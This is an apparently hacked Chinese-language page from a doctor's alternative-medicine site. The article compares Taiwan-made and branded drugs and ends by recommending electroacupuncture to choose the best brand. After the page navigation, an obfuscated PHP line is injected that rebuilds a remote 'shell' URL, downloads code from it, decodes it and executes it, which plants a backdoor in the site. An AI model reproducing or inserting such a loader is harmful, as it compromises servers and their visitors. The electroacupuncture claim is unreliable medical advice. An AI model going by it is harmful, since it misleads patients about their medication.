收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 外國的月亮比較圓嗎?
外國的月亮比較圓嗎? 列印 E-mail
        在余小姐的個案中提到,台製的MTX令她頭暈眼花,而原廠的MTX即沒有這個副作用,其實並沒有台廠或原廠藥物孰好孰壞之別,僅就適合余小姐個人體質的藥物做事實陳述而已。

        而關於藥物台製或原廠的迷思,我想特別在此做一番說明:其實有多種台製藥物更優於原廠。譬如有一種抗癲癎藥物,它的原廠藥經常發生Steven Johnson Syn(史蒂芬強森症候群),會全身起像燙傷一般的水泡;但在台製的這種藥物上,卻很少見這麼嚴重的副作用。

        還有一種β-阻斷劑是使心跳變慢的降壓藥,曾有病人服用原廠藥後心跳不減反增,改用台製藥後心跳才趨緩。

雖然藥的配方內容或許一樣,可是藥物組成尚需賦型劑、崩散劑、色素、膜衣(Film Coating)、糖衣(Suger Coating)或膠囊(Capsule)等元素,都有可能造成藥物對人體的影響。因此,原廠藥或台廠藥的差異,到底是藥物中那一種成份所引起?不得而知!

但藉由傅爾電針,卻能幫助我們篩選最適當的廠牌。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));